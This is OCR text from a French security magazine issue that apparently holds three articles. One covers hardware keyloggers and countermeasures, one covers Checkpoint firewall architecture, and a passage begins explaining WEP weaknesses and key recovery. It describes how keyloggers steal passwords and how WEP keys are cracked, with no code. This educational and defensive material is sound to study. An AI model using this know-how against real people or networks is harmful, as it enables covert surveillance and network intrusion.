EXPLIQUE... manière légale : intéresserons à la seconde catégorie, celle des
keyloggers matériels.
Ce que sont les keyloggers,
leurs menaces potentielles et • pour faire une copie d'éléments de preuve
leur principe de fonctionnement. dans le cadre d'une enquête Keyloggers logiciels
Comment protéger votre • pour faire une copie de documents sensibles Les keyloggers les plus sophistiqués disposent de
entreprise de ces menaces.
en cas de crash système ou matériel plusieurs fonctions, parmi lesquelles l'enregistrement
Ce à quoi vous pouvez vous
attendre dans le cadre des • pour surveiller l’accès aux contenus des frappes clavier. En règle générale, il est possible
développements futurs. pornographiques et protéger les enfants de réaliser des captures d'écran de la machine
• pour surveiller les possibles abus d’employés cible puis de s’authentifier sur le programme pour
CE QU'IL FAUT
SAVOIR... pendant leur temps de travail consulter les données enregistrées. Aujourd'hui, la
• pour servir de support aux détectives privés et plupart des keyloggers autorisent la transmission
Aucune connaissance préalable
n'est requise. experts en sécurité automatique des fichiers logs vers des adresses

30 HAKIN9 03/2010

30_35___hardware.indd 30 2010-03-10, 16:20:19


LES KEYLOGGERS MATÉRIELS - UNE MENACE SÉRIEUSE

mails ou serveurs web. D'autres keyloggers L'un des points particulièrement forts des non-volatile de type EEPROM ou FLASH. La
permettent d'enregistrer la voix, les flux vidéo keyloggers matériels est l'enregistrement de capacité mémoire de ce type de supports
sur webcams ou les données saisies par l'ensemble des données dès le lancement est relativement faible (512ko et 4Mo) mais
l'utilisateur (les keyloggers utilisés pas les de l'ordinateur, sans être détectés par les amplement suffisante pour enregistrer
pirates intègrent généralement des rootkits anti-virus ou anti-spywares. Il est donc des données texte. Il existe également des
et d'autres programmes malveillants pour possible de récupérer des mots de passe modèles PS/2 et USB. Vous n'avez donc pas
exploiter les données de l'utilisateur ; il s'agit cryptés sur le système cible ou à partir du à vous soucier de cet aspect lorsque vous
alors d’applications « hybrides ». BIOS. L'utilisation de keyloggers matériels branchez l'appareil au clavier (Voir Figure 7).
L’un des principaux défauts des est discrète et ne provoque pas l'affichage Les claviers fonctionnent tous à peu
keyloggers logiciels est leur manque de de messages d'avertissement à l'écran de près de la même manière. Toutes les
discrétion, ils sont facilement repérables. l'utilisateur. À noter également que ce type touches sont répertoriées sous la forme
Les keyloggers logiciels exécutent des de keyloggers est indépendant du système d'une matrice. Chacune a soit le statut
programmes sur la machine cible et d'exploitation utilisé. Windows, Linux/ key down (touche enfoncée), soit key freed
laissent plus ou moins de traces selon UNIX, Mac OS, Solaris n'offrent aucune (touche libérée). Un microcontrôleur, appelé
le système. Par ailleurs, les keyloggers protection contre les keyloggers matériels. encodeur de clavier, détermine le statut de
logiciels se lancent au démarrage Les keyloggers matériels ont également chaque touche et transmet l'information à
du système d'exploitation ou après l’avantage de récupérer les données saisies l'ordinateur par scancode. La carte mère
authentification à l'écran d'accueil Windows. par l’utilisateur sans laisser de traces (Voir possède un contrôleur clavier qui récupère
Il est donc impossible d'enregistrer des Figure 4). ces données, les décode et les transmet
mots de passe du BIOS, informations de Avec des keyloggers matériels sans fil au système d'exploitation ou au logiciel [9].
connexion au démarrage de Windows ou ou Bluetooth [8], l'attaquant doit disposer Le protocole PS/2 est un protocole
des partitions cryptées de type TrueCrypt. de plusieurs points d'accès à la machine simplifié, compatible avec tout type
même si un seul point d’accès physique de claviers. Même si l'USB tend à le
Keyloggers matériels est suffisant. En clair, vous ne pouvez pas remplacer, ce protocole est toujours utilisé
Les keyloggers matériels sont moins utilisés envoyer de logs vers une ou plusieurs dans le monde entier.
que les keyloggers logiciels, mais leur adresse(s) mail(s) (Voir Figure 5). La norme USB est gérée de manière
portée est beaucoup plus dévastatrice. Autre désavantage, tous les claviers plus complexe, mais les touches clavier sont
Contrairement aux keyloggers logiciels, ne sont pas supportés et le fichier log enregistrées sans difficulté. Généralement,
les keyloggers matériels doivent être peut être corrompu ou incomplet. les données sont d'abord récupérées avant
branchés physiquement à la machine L'analyse peut être longue et difficile. d'être recopiées sur le support.
cible. En général, cette catégorie de Bien que toutes les frappes claviers soient Outre les multiples possibilités de
keyloggers est branchée entre le clavier et enregistrées, rien ne permet d'indiquer connexion et d'enregistrement des frappes
l'ordinateur (en externe). L'installation se fait la provenance (site Web, formulaires, clavier, de nombreux keyloggers disposent
donc en seulement quelques secondes document Word, Tchat, banque...) des de fonctionnalités de cryptage, horodatage
sans configuration préalable, ce qui permet données capturées. Il est donc difficile de et communications sans fil.
même aux débutants d'utiliser ce type faire la différence entre données sensibles Le cryptage des données est utilisé
de matériel (Voir Figure 2). Le keylogger ou non (Voir Figure 6). Par ailleurs, le prix comme méthode de protection lors
s'adapte parfaitement aux claviers avec de ce type de matériel est coûteux et d'un accès frauduleux à une page non
ports PS/2 ou USB sur l'ordinateur. dépend des fonctionnalités d'installation/ autorisée (détection/analyse).
Il en existe même qui sont intégrés désinstallation recherchées. Selon l’objectif visé, les keyloggers
directement aux claviers [6] ou aux qui disposent de fonctions timestamping
commutateurs KVM (clavier, carte vidéo, Implémentation et modèles peuvent être utilisés pour des enquêtes ou
souris) tandis que d'autres sont reliés La plupart des keyloggers sont fournis pour analyser l’utilisation des ressources
directement à la carte mère, généralement avec un microcontrôleur et une mémoire en période de temps de travail.
PCI [7] (en interne) (Voir Figure 3).

Figure 1. KeyGhost USB - Keylogger


matériel [4] Figure 2. Avant/Après [2]

03/2010 HAKIN9 31

30_35___hardware.indd 31 2010-03-10, 16:20:27


FOCUS
Les technologies sans fil, telles que Autre scénario possible, l'utilisation d'un audits permettent d'appliquer des contre-
le Bluetooth, permettent à l'attaquant de keylogger pour récupérer des coordonnées mesures et d'instaurer une politique de
récupérer des fichiers logs à distance. Les bancaires. sécurité de l'information dans l'entreprise.
mécanismes d'authentification fondés sur N.B. Le fait de voler l'argent du compte Les employés doivent suivre également
le temps sont facilement contournés et les bancaire de la victime vers le compte de des formations pour prévenir les attaques
données facilement récupérées. l’attaquant reste difficile. Des programmes et savoir y répondre.
En fonction du modèle de keylogger, de cryptage de type TrueCrypt permettent de La majorité des keyloggers sont
les données peuvent être récupérées protéger les données sensibles des entreprises branchés entre le clavier et l'ordinateur.
à distance. En Bluetooth, la distance ou des agences gouvernementales. Avec D'autres sont intégrés au clavier et certains
maximale est de 300 mètres bien qu'il un keylogger matériel, les touches utilisées sont insérés dans l'ordinateur. La meilleure
soit possible d'aller plus loin avec des pour décrypter ces données peuvent être protection reste la sécurisation des
antennes pour atteindre des distances de récupérées et enregistrées. Par conséquent, accès physique. Par exemple : capteurs
1Km ou plus (Voir Figure 9). le problème des données préalablement biométriques, analyses régulière des
Les fichiers logs sont récupérés sur cryptées ne se pose plus (Voir Figure 12). systèmes, accès réservés... En outre, des
chaque ordinateur possédant le keylogger. En autorisations spécifiques peuvent être
général, un mot de passe doit être saisi dans Contre-mesures attribuées pour certains membres du
un éditeur de texte afin de générer un menu Les entreprises doivent régulièrement personnel. De préférence, lorsque l'accès
avec options ou passer en mode Flash USB. procéder à des audits en interne. Ces est initié.
Cela se fait à partir de la machine cible ou
sur tout autre (Voir Figure 10) machine.
Un keylogger est difficilement repérable.
Aucun signe particulier, ralentissement ni
aucune anomalie ne permet à l’utilisateur
d’en soupçonner l’existence (Voir Figure
11).
Le prix d'un keylogger varie de 30$ à
100$, il existe différents modèles pour tous
les budgets.

Scénarios
Les keyloggers matériels sont une véritable
menace. Ils peuvent être utilisés avec
d'autres attaques pour compromettre un
système informatique.
L'objectif est généralement d'obtenir Figure 4. KeeLog USB KeeLogger TimeKeeper
des informations avant de poursuivre
une attaque. Parfois, il suffit à l’attaquant
d’obtenir un seul mot de passe utilisateur
pour perpétrer une attaque à grande
échelle. Ce principe se retrouve sur
les sites Web, forums, réseaux sociaux
et autres sites apparentés. Ces sites Figure 5. Mise en place d'un Keylogger Bluetooth [8]
contiennent généralement des données
dites sensibles.

Figure 3. KeyCarbon Raptor – Keylogger


matériel pour ordinateurs portables [7] Figure 6. Exemple de fichier log

32 HAKIN9 03/2010

30_35___hardware.indd 32 2010-03-10, 16:20:34


LES KEYLOGGERS MATÉRIELS - UNE MENACE SÉRIEUSE

Si la limitation de l'accès physique est sera plus facilement détecté parmi tous les sensibles et mots de passe. Un clavier
difficile à mettre en œuvre, il est toujours branchements à l’ordinateur. virtuel existe par défaut sous Windows XP
possible de sécuriser les connexions de Bien que l'auteur n'ait pas trouvé (Démarrer >Tous les programmes >Acces
l’ordinateur. Lorsque les connexions PS/2 de keyloggers qui fonctionnent en tant soires >Accessibilité > Clavier visuel) (Voir
et USB ont été correctement paramétrées, il qu'adaptateurs, rien ne prouve qu'il n'en Figure 14).
est difficile de brancher un autre appareil. existe pas. Dans ce cas, la souris est utilisée
Si un attaquant n'a pas accès à Autre recommandation : utiliser les pour entrer les informations à l’écran.
l'ordinateur, ni aux connexions, il cherchera claviers virtuels pour la saisie de données Les keyloggers matériels ne peuvent
à s'attaquer au clavier. Sur le clavier (et les
boîtiers d'ordinateurs) des scellés peuvent
être ajustés, semblables à celles qui sont
sur les portables et les disques dur.
D'autres mesures plus onéreuses
existent, comme les CCTV ou gardiens de
sécurité.
Les keyloggers matériels ne sont pas
détectés par les logiciels ; par conséquent,
une inspection visuelle est recommandée.
Les fils clavier/souris sont à disposer de
manière à procéder plus rapidement
à l'inspection. Il en va de même pour
les scellés présents sur le clavier et
l'ordinateur.
Il est également recommandé de ne
pas utiliser de convertisseurs PS/2 et USB,
ni de rallonges, qui pourraient s'apparenter
aux keyloggers matériels. Ainsi, un keylogger

Figure 10. Logiciel KeyCarbon - Récupérer les fichiers logs

Figure 7. Microprocesseur et contrôleur


de circuit [12]

Figure 8. Matrice clavier [12]

Figure 9. Keylogger Bluetooth - PS/2 [8] Figure 11. Logiciel KeeLogs - Récupérer les fichiers logs

03/2010 HAKIN9 33

30_35___hardware.indd 33 2010-03-10, 16:20:43


FOCUS
enregistrer ces données étant donné qu'il
Bibliographie ne s'agit pas de connexions physiques.
Cependant, pour un usage quotidien cette
• [1] http://www.keycarbon.com/ (2009-07-10) méthode n'est pas appropriée. Certains
• [2] http://www.keelog.com/ (2009-07-10)
keyloggers avec des fonctionnalités
• [3] http://www.keydevil.com/ (2009-07-10)
• [4] http://www.keyghost.com/ (2009-07-10) avancées peuvent récupérer ces données
• [5] http://www.truecrypt.org/ (2009-08-10) en utilisant cette méthode. Les techniques
• [6] http://amecisco.com/hkkeyboard.htm (2009-08-10) de shoulder surfing (vol de données en
• [7] http://www.keycarbon.com/products/keycarbon_laptop/overview/ (2009-08-10) jetant en coup d'œil) peuvent également
• [8] http://www.wirelesskeylogger.com/ (2009-08-10) être employées.
• [9] http://en.wikipedia.org/wiki/Keyboard_(computing) (2009-08-10)
• [10] http://www.remote-exploit.org/Keykeriki.html (2009-08-10)
• [11] Zhuang, L, Zhou, F. & Tygar, J.D. (Novembre 2005). Acoustique clavier
Modèles futures
• http://www.cs.berkeley.edu/~zf/papers/keyboard-ccs05.pdf (2009-08-10) Les futurs modèles offriront plus de
• [12] http://computer.howstuffworks.com/keyboard2.htm (2009-08-10) fonctionnalités alors que nous assistons à
une miniaturisation des supports sans fil.
Max Moser et Keykeriki [10] ont récemment
sorti un sniffer sans fil pour clavier. Les
frappes clavier sont enregistrées à
distance sur une fréquence de 27MHz.
Avec l'essor du sans fil, ces techniques
seront de plus en plus utilisées. Elles
pourraient également être utilisées dans
le domaine de l'acoustique. En effet, les
ondes sonores sont mesurées à chaque
frappe clavier, ce sont ces données que
l’attaquant récupérera. Plusieurs études ont
démontré que cette technique est efficace
pour récupérer 90 à 96% des frappes
clavier d'un fichier son d’une durée de 10
minutes [11].

Conclusion
Figure 12. Avant/Après (Keylogger sans fil) Nous vous avons donné un bref aperçu
des techniques utilisées sans tomber dans
l'exhaustivité. Ces attaques sont faciles à
mettre en œuvre et peuvent provoquer de
lourds dégâts. Bien que peu utilisés, les
keyloggers matériels représentent une
vraie menace pour les entreprises et les
particuliers.
Il existe plusieurs contre-mesures
dont certaines sont faciles à mettre en
œuvre pour réduire considérablement les
risques. N'oublions pas que la formation
Figure 13. Keyghost USB - Keylogger [4]
des employés joue également un rôle
primordial et qu’un utilisateur averti en vaut
deux !

Michael R. Heinzl
Michael R. Heinzl est un expert en sécurité informatique
depuis plusieurs années et se spécialise dans les tests
d'intrusion et les techniques de rétro-ingénierie.
Vous pouvez le contacter directement à partir de son site
www.awesec.com ou sur le site de sécurité autrichien
Figure 14. Clavier virtuel Microsoft Windows XP www.defense.at.

34 HAKIN9 03/2010

30_35___hardware.indd 34 2010-03-10, 16:20:53


30_35___hardware.indd 35 2010-03-11, 12:55:52
PRATIQUE
TONY FACHAUX

La sécurité
périmétrique
avec Checkpoint
Degré de difficulté Nous vous présenterons, d'une manière générale, les moyens
techniques à mettre en œuvre pour réaliser une sécurité
périmétrique efficace avec l'un des équipements Checkpoint.
Cette sécurisation passe par la mise en place d'un pare-feu. Nous
parlerons de la technologie Checkpoint, leader dans la sécurité
périmétrique auprès des plus grandes organisations, comme des
banques.

L
a sécurité périmétrique est aujourd'hui une qui est une technologie leader sur le marché et
composante essentielle à la sécurité d'une qui protège les plus grandes organisations dans
infrastructure. Cette sécurité passe par le monde.
la mise en place d'un pare-feu (ou firewall). De
nombreux constructeurs sont présents sur ce Rappel sur les pare-feux
créneau, tels Cisco, Checkpoint ou encore Juniper. Un firewall est un équipement physique de sécurité
Nous traiterons ici de la technologie Checkpoint réseau qui permet de filtrer le trafic entre différents

LAN DMZ Management

Clusters de
firewalls
CET ARTICLE Checkpoint

EXPLIQUE...
Comment fonctionne la
technologie Checkpoint.

Comment sécuriser une


architecture réseau avec Utilisateur SmartCenter
Checkpoint.

CE QU'IL FAUT
SAVOIR...
Quelques notions sur le
fonctionnement d'un firewall. Figure 1. Schéma de principe d'une architecture Checkpoint

36 HAKIN9 3/2010

36_39____checkpoint.indd 36 2010-03-10, 16:21:43


LA SÉCURITÉ PÉRIMÉTRIQUE AVEC CHECKPOINT

réseaux. Les firewalls réseau actuels sont encore plus accrue, il est même conseillé montrant une architecture Checkpoint
stateful, c'est-à-dire qu'ils conservent d'avoir deux barrières firewalls avec des de base.
toutes les sessions dans une table. C'est versions différentes, voire de constructeurs La flèche rouge représente les flux
bien plus efficace que du simple filtrage différents. Les firewalls Checkpoint ne d'administration alors que la flèche bleue
de paquets proposés sur des routeurs s'administrent pas directement en se représente le flux qui installe la politique
utilisés avec des access lists. Nous n'irons connectant dessus en SSH ou HTTP. Il sur les firewalls. Les firewalls se gèrent
pas plus loin dans la définition d'un firewall faut installer sur un serveur à part, une à travers le serveur et non pas en s'y
car nous partons du principe que vous station de management. Cette station connectant directement.
avez les bases dans ce domaine. Notre est la SmartCenter qui tourne, elle aussi,
but est de vous présenter les principes de sur différentes plates-formes (Windows, La console d'administration
la technologie Checkpoint. Solaris ou Secure Platform). La figure La console d'administration Checkpoint
1 représente un schéma de principe est accessible avec un client appelé
L'architecture Checkpoint
Avant toute chose, il convient d'expliquer
un peu l'architecture Checkpoint qui est
un peu particulière. Checkpoint est en fait
un UTM (Unified Threat Management),
c'est-à-dire une appliance qui dispose
de plusieurs fonctionnalités de sécurité
comme le pare-feu réseau, l'IPS, le VPN
SSL ou encore le filtrage d'URL. Depuis sa
création, Checkpoint est majoritairement
utilisé comme pare-feu, ce qui en fait
sa force. Il est aussi beaucoup utilisé
pour sa fonctionnalité VPN site à site. La
couche firewall Checkpoint est installée
sur une plate-forme. Elle s'installe soit sur
une plate-forme de type Windows, soit
Solaris, Secure Platform ou encore Nokia Figure 2. Console d'administration Checkpoint
IPSO. Secure Platform est un OS fondé
sur une Red Hat Linux développée par
Checkpoint. Les plates-formes Windows,
Solaris et Secure Platform ne sont en fait
que de simples serveurs. Nokia IPSO est
un OS s'appuyant sur FreeBSD qui tourne
sur une appliance. Mais depuis le rachat
de Nokia par Checkpoint, un nouvel OS
IP Publique: x.x.x.x.
issu de la fusion entre IPSO et Secure
Platform est en cours de développement.
Cet OS s'appelle Gaia. Par expérience,
DMZ Publique
les firewalls les plus performants sont
ceux tournant les plates-formes Nokia
IPSO. Puisque les firewalls Checkpoint
protègent généralement de grandes Clusters de
firewalls
organisations, ils sont redondés. Deux Checkpoint
barrières de firewalls (une barrière en
frontend et une en backend) sont aussi
relativement souvent rencontrées. C'est
ce qui s'appelle faire de la sécurité en
IP Privée
profondeur. En effet, si un pirate arrive 192.168.0.1
à pénétrer les DMZ publiques qui sont
derrière la première barrière de firewall, il
y a encore une autre barrière de firewall
à pirater, ce qui complexifie énormément
la tâche des pirates. Pour une protection Figure 3. Static Source NAT

3/2010 HAKIN9 37

36_39____checkpoint.indd 37 2010-03-11, 12:56:51


PRATIQUE
SmartDashboard qui s'installe sur une utilisation est relativement simplement, d'un règles de filtrage en spécifiant la source, la
station de travail tout à fait classique. Son côté nous pouvons modifier et ajouter des destination, le protocole, si nous loggons ou
non, la plate-forme sur laquelle appliquer la
règle et enfin un commentaire. Depuis un
autre onglet, nous avons aussi la possibilité
d'ajouter ou modifier des règles de NAT
sur le même principe que précédemment.
Checkpoint s'administre à l'aide d'une base
objets qui se trouve à gauche de l'écran.
IP Publique: x.x.x.x. Elle contient des objets classiques (des IP),
des groupes d'objets, des services. Nous
avons aussi la possibilité de créer des
DMZ Publique objets polymorphiques : il s'agit d'objets qui
disposent d'une IP différente en fonction du
site sur lequel est déployée la policy. Depuis
Clusters de
cette console, nous gérons aussi les plates-
firewalls formes Checkpoint ainsi que quelques
Checkpoint
paramètres réseau. Un paramètre important
à vérifier est le nombre de sessions
maximum que peut supporter le firewall,
sans oublier la durée durant laquelle une
192.168.0.1:80 192.168.0.2:21 session reste active dans le firewall. Vous
trouverez sur la figure 2 une représentation
de cette console d'administration.

Les règles de filtrage


Nous avons vu un peu plus haut que la
Figure 4. Static Dynamic NAT
console d'administration permettait de
gérer les règles de filtrage et de NAT qui
sont les 2 éléments majeurs dans la
gestion d'un firewall. Comme son nom
l'indique, les règles de filtrage permettent
d'autoriser ou non un flux réseau selon sa
source, sa destination et son protocole. Par
défaut, tout ce qui n'est pas explicitement
autorisé est interdit.
IP Publique:

LAN
Le NAT
Chez Checkpoint, il existe trois types de
NAT :

• Le Static Source NAT qui permet de


Clusters de nater une IP privée vers une IP publique
firewalls
Checkpoint
(figure 3)
• Le Static Dynamic NAT qui permet de
rediriger un flux d'Internet avec un port
spécifique vers un serveur situé en
Réseau privé
192.168.0.0/24 DMZ (figure 4)
• Le Hide NAT permet, quant à lui, de
nater un groupe d'IP privées vers une IP
publique (figure 5).

La redondance
Comme indiqué plus haut, il est important
Figure 5. Hide NAT d'avoir un cluster de firewalls pour la

38 HAKIN9 3/2010

36_39____checkpoint.indd 38 2010-03-11, 12:59:57


LA SÉCURITÉ PÉRIMÉTRIQUE AVEC CHECKPOINT

tolérance de panne. Généralement installé


Sur Internet sur des plates-formes Nokia, la technologie
VRRP est utilisée pour redonder les
• http://www.checkpoint.com/ – Site officiel de Checkpoint.
firewalls. Dans ce cas, les tables de
• http://www.cpug.org/ – Site consacré à Checkpoint.
sessions sont échangées en temps réel et
si un firewall tombe, l'autre prend le relais
de façon complètement transparente pour
les utilisateurs.

Le Troubleshooting

SmartView Tracker
Afin de troubleshooter les flux transitant
dans le firewall, l'utilitaire SmartView Tracker
de Checkpoint est extrêmement efficace. Il
permet de consulter tous les logs du
firewall. Vous pouvez observer un aperçu
sur la figure 6.

Fw monitor
Fw monitor est un utilitaire propriétaire
Checkpoint qui équivaut un peu à tcpdump
Figure 6. SmartView Tracker sous Unix. C'est un outil très efficace pour
récupérer des traces réseau et analyser
des requêtes.

Exemple d'architecture
Checkpoint
La figure 7 représente un cas réel
d'exemple d'architecture Checkpoint.
Routeur Routeur Les firewalls Checkpoint sont
opérateur 1 opérateur 2 positionnés derrière des IPS réseau, eux-
mêmes disposés derrière les routeurs
Internet. Les firewalls sont configurés en
cluster et sont directement connectés au
cœur de réseau de la société.
Frontend
DMZ Publique
Conclusion
Nous venons de voir uniquement les
interco
bases de la sécurité périmétrique avec
Checkpoint et pourtant, la performance de
cette technologie et ses très bons outils de
Backend
troubleshooting semblent évidents.
LAN
DMZ Management

À propos de l'auteur
L'auteur travaille en tant qu'ingénieur sécurité chez
SmatrCenter Dimension Data Luxembourg. Son métier consiste en la
conception, la mise en œuvre et le support d'architectures
de sécurité pour des clients grands comptes. Diplômé
d'un Master en « Sécurité Informatique » à l'EPITA à Paris,
il se passionne pour les technologies de sécurité de
Figure 7. Exemple d'architecture Checkpoint l'information.

3/2010 HAKIN9 39

36_39____checkpoint.indd 39 2010-03-11, 13:00:24


PRATIQUE
DAVID TORTEL

Intrusion et
exploitation d'un
réseau mal sécurisé
Souvent au cœur des polémiques, le protocole Wired Equivalent
Degré de difficulté
Privacy reste implémenté par défaut dans la plupart des routeurs
domestiques, voire des entreprises peu soucieuses de la sécurité de
leurs systèmes d'information. Cet article propose un nouveau tour
d'horizon du fonctionnement de ce protocole et de ses faiblesses.
L'approche se veut didactique afin de comprendre en profondeur les
différentes étapes de la compromission d'un réseau peu sécurisé.

N
ous nous concentrerons dans une sorte que seule une machine possédant la clé
premiere partie sur le contrôle d'un point puisse comprendre le message. Néanmoins,
d'accès à chiffrement faible. Celui-ci, au ce protocole de chif frement possède plusieurs
mieux, utilise un protocole de chiffrement de type failles le rendant vulnérable. Dès lors, des outils
WEP – Wired Equivalent Privacy –. se sont développés en vue d’exploiter ces failles.
Après avoir compris les problèmes intrinsèques
Le chiffrement au protocole, nous allons étudier l’utilisation de
Wired Equivalent Privacy l’un de ces outils, la suite Aircrack–ng – open
Que ce soient les particuliers avec les box source – utilisée avec une distribution de linux
ou les entreprises avec des routeurs plus spécialisée dans l'analyse réseau et les tests
professionnels, tous ont souvent recours à des d'intrusion : Backtrack .
points d'accès sans fil Wifi pour des questions
de mobilité. Dans le cas des particuliers, le wifi Les Beacons
est souvent fourni par défaut et activé dans Un point d'accès envoie de façon régulière
les box avec un chif frement faible : WEP. Pour et rapprochée – en moyenne toutes les 0,1
introduire l'étonnante actualité de cet article secondes – des trames de balisage. Celles-ci,
sur l'éternel sujet de la sécurité du WEP, une nommées beacons, permettent à une station qui
étude menée à Paris démontre que 41% des pénètre dans la zone d'émission du point d'accès
box ont un chif frement WEP, 47% un chif frement de connaître son existence, ainsi que certains
CET ARTICLE WPA et 12% sont non sécurisées. Cette étude paramètres de la cellule Wifi – en général : SSID,
EXPLIQUE... est publiée dans l'article Tour d'horizon ESSID, la liste des débits ainsi que les modes
Le fonctionnement détaillé du du wifi à Paris, MISC Janvier/Février et les méthodes d'authentification – En écoutant,
protocole WEP, ses faiblesses,
l'intrusion dans un réseau wifi
2009. Le protocole WEP a été pensé afin nous connaissons alors l’ensemble des points
mal sécurisé, les fondements de rendre confidentiels les dialogues Box/ d'accès – que nous nommerons dans toute
et la réalisation d'un rogue
AP, d'une attaque MITM avec
ordinateurs, dans une optique de sécurité. la suite AP – non invisibles qui émettent à une
le logiciel ettercap et d'un L'idée était de proposer une sécurité semblable distance raisonnable : il s'agit de l’ensemble
empoisonnement DNS.
à celle qu'of frait l'Ethernet c'est-à-dire que des AP à l'origine des beacons reçus. Il est
CE QU'IL FAUT les messages doivent être accessibles par important de noter ici que certains points
SAVOIR... l'ensemble des machines du sous-réseau d'accès sont configurés pour ne pas émettre
Connaissances sur le protocole et celles-là uniquement. Dans cette optique, de beacons, ce qui constitue une mesure de
DNS, connaissances de chaque donnée est chif frée avec une clé sécurité performante lorsqu'aucune station n'est
base d'UNIX et des certificats
numériques secrète puis transmise ainsi sur le canal de telle connectée.

40 HAKIN9 3/2010

40_49____wifi.indd 40 2010-03-10, 16:24:26


INTRUSION ET EXPLOITATION D'UN RÉSEAU MAL SÉCURISÉ

Les caractéristiques du WEP [Cle | iv] [Donnees | CRC32(Donnees)] et


Le protocole WEP, pensé dans le but de RC4(Cle | iv) ,
fournir une sécurité dans les réseaux En parallèle, nous nous occupons de
sans fil respecte la triade CIA des critères l'intégrité des données : nous faisons une cela donnera notre message chiffré.
fondamentaux de la sécurité: somme de contrôle CRC32 – contrôle de Sur les ondes apparait alors la trame –
redondance cyclique également utilisé en
• l'authentification, Ethernet – que nous concaténons avec RC4(Cle | iv)XOR[Donnees |
• la confidentialité des données : les données à transmettre pour nous CRC32(Donnees)]
chaque donnée est chiffrée avec ramener à :
une clé partagée par l'ensemble des – avec le vecteur d'initialisation transmis
stations du réseau et par l'AP, [Donnees | sommeCRC32] en clair afin que l'AP puisse déchiffrer le
• l'intégrité des données. message.
Nous reprenons la graine et lui appliquons
L'authentification un chiffrement RC4 – algorithme simple à Les faiblesses du WEP
Chaque station, avant de communiquer implémenter qui se fonde sur la clé – Le protocole WEP, dont nous venons de
avec le point d'accès et d'être en mesure Nous nous retrouvons maintenant avec décrire brièvement le fonctionnement,
de faire des requêtes sur la toile doit au comporte plusieurs failles que nous
préalable s'authentifier. On compte deux RC4(Cle | iv) pouvons maintenant expliciter.
sortes d'authentification: Pour commencer, aucun mécanisme
Ce dernier résultat nous permettra de ne permet d'empêcher le rejeu ou
• Open System Authentification chiffrer les données que nous souhaitons l'injection de données, ce qui, nous le
envoyer. En effet, nous faisons un où verrons, nous permettra de mettre la
Chaque station qui le souhaite est exclusif entre les entités main sur la clé.
immédiatement authentifiée

• Shared Key Authentification

La station qui veut se connecter sur la


toile fait une requête d'authentification
auprès de l'AP. Celle-ci lui envoie un défi.
Il s'agit d'un texte de 128 octets aléatoires,
envoyé en clair. La station désireuse de
s'authentifier doit chiffrer le texte avec
la clé. Une fois chiffré, le message est
renvoyé au routeur. L'AP déchiffre le
message et le compare au message
initial. S'il y a concordance, la station est
acceptée et l'AP envoie une trame positive
d'authentification ; dans le cas contraire, la
station est refusée.
Figure 1. Les routeurs TECOM-AH4021 et 4222 utilisent par défaut des clés WEP
Confidentialité et intégrité des directement reliées à leur ESSID
données
La clé de chiffrement des données est
composée de la clé partagée – clé de 40
bits, 104 bits ou 232bits – et d'un vecteur
d'initialisation – suite aléatoire de 24 bits
– qui change à chaque trame émise.
La première étape de l'émission d'une
trame consiste à calculer cette clé:
Il faut commencer par concaténer la
clé partagée et le vecteur d'initialisation
pour se ramener à une graine – ou Key
Scheduling Algorithm de 64 bits, 128 bits
ou 256 bits. On a Figure 2. Le position de MITM permet de contrôler l'intégralité du trafic non sécurisé

3/2010 HAKIN9 41

40_49____wifi.indd 41 2010-03-10, 16:24:33


PRATIQUE
La séquence d'authentification est RC4(Cle|iv) Une autre condition sine qua non de
en clair. l'utilisation de cet algorithme RC4 est de
Si nous réussissons à écouter une est longue de 144 octets, nous pouvons laisser de côté les 512 premiers octets de
demande d'authentification – nous pouvons donc commencer à envoyer des requêtes la sortie RC4 afin d'éviter de construire une
créer une demande d'authentification en ARP ou HTTP dont la longueur est inférieure clé faible. En effet, de telles clés procurent
déconnectant n'importe quelle station - , à 144 octets. Cette sortie nous permettra des informations sur l'état interne de la
nous aurons accès à suffisamment de également de déchiffrer les 144 premiers table RC4. Pourtant, cette condition, au
données pour répondre à n'importe quel octets de tous les messages envoyés avec début du WEP, n'est pas implémentée. Par
challenge et donc s'authentifier sans ce vecteur d'initialisation. ailleurs, une clé faible se reconnaît par ses
connaitre la clé. En effet, notons C le trois premiers octets, soit en l'occurrence le
challenge, c'est-à-dire le texte que propose Une clé trop courte vecteur d'initialisation qui est, comme précisé
l'AP pour l'authentification. Ce texte est L'entropie du domaine des clés est ci-dessus, transmis en clair sur les ondes.
émis en clair à une machine qui désire faible. En effet, même si la clé qui sert La suite va consister à trouver le
se connecter. Nous pouvons donc avoir au chiffrement – RC4(clé|iv) – est codée maximum de sortie RC4(Cle|iv). Le but
accès à C. La machine qui connait la clé 128 ou 256 bits, la partie principale est de récupérer le maximum de trames
renvoie à l'AP la réponse de la clé est statique et seul le vecteur avec des iv faibles qui permettront d'avoir
d'initialisation codé sur 24 bit est des connaissances sur l'état interne de
R=RC4(Cle|iv)\XOR(C|CRC32(C)), variable. Par conséquent l'espace des RC4 et donc de trouver purement et
clé est en soit réduit à 24 bits, ce qui est simplement la clé. Cette attaque date de
ce qui correspond au message C chiffré. extrêmement faible. 2001.
Nous trouvons donc immédiatement avec Dès lors, le calcul de probabilité Très vite, les constructeurs ont
un XOR – voir paradoxe des anniversaires - supprimé les iv faibles ; il a donc fallut
démontre qu'il y a 99% de probabilités attendre qu'une amélioration voit le jour.
RC4(Cle|iv)=R XOR (C|CRC32(C) – d'avoir une collision de clés toutes les Celle -ci n'a pas trop tardé à arriver. En
12000 émissions, c'est-à-dire toutes les effet, H1kari et Korek ont tout d'abord tenté
R et C sont connus, donc nous en 12000 trames émises nous avons 99% d'étendre ce type d'attaque à d'autres iv
déduisons une clé particulière, celle de possibilités de retomber sur le même avant de parvenir à l'étendre à l'ensemble
relative au vecteur d'initialisation utilisé lors vecteur d'initialisation. 12000 trames des vecteurs d'initialisation. L'idée sous-
de l'authentification de la machine légitime. sont émises environ en une vingtaine de jacente est qu'il est possible de prévoir
Une fois connue la sortie secondes. Or, des études démontrent avec une très bonne probabilité la plupart
que l'utilisation de la même sortie RC4 des octets présents dans l'entête des
RC4(Cle|iv), dans le même contexte provoque une paquets car ceux-ci répondent à des
fuite d'informations importante. En effet, en normes assez strictes. L'implémentation la
nous pourrons faire une demande gardant les notations précédentes et si P et plus célèbre qui utilise cette méthode est
d'authentification puis répondre au challenge P' sont deux trames qui ont utilisé le même le logiciel Aircrack que nous exploiterons
avec le même iv. Une fois authentifié, et vecteur d'initialisation pour chiffrer deux plus loin. Pour cela, nous injectons dans
toujours en possession de la sortie messages M et M', il vient le réseau un maximum de requêtes dont
nous sommes capables d'anticiper la
RC4(Cle|iv) P = RC4(Cle|iv) XOR (M|CRC32(M)) réponse afin de récupérer le maximum de
